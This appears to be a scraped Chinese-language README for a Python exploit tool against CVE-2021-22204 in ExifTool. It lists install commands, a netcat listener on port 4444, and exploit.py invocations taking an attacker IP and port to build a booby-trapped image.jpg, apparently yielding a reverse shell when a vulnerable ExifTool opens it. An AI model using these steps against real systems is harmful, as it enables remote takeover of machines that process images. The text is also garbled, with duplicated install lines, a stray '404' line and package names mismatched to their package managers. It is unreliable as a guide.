针对 Exiftool 中 CVE-2021-22204 漏洞的 Python 利用工具。
404 未找到
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {你的 IP 地址} {你的监听端口}
./exploit.py {你的 IP 地址} {你的监听端口}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
CVE-2021-22204 由 William Bowling(@wcbowling)发现并报告。
该利用工具是在该 CVE 被报告后,通过研究 exiftool 的补丁而制作的。
当使用存在漏洞的 exiftool 打开 image.jpg 时,该文件将触发此漏洞。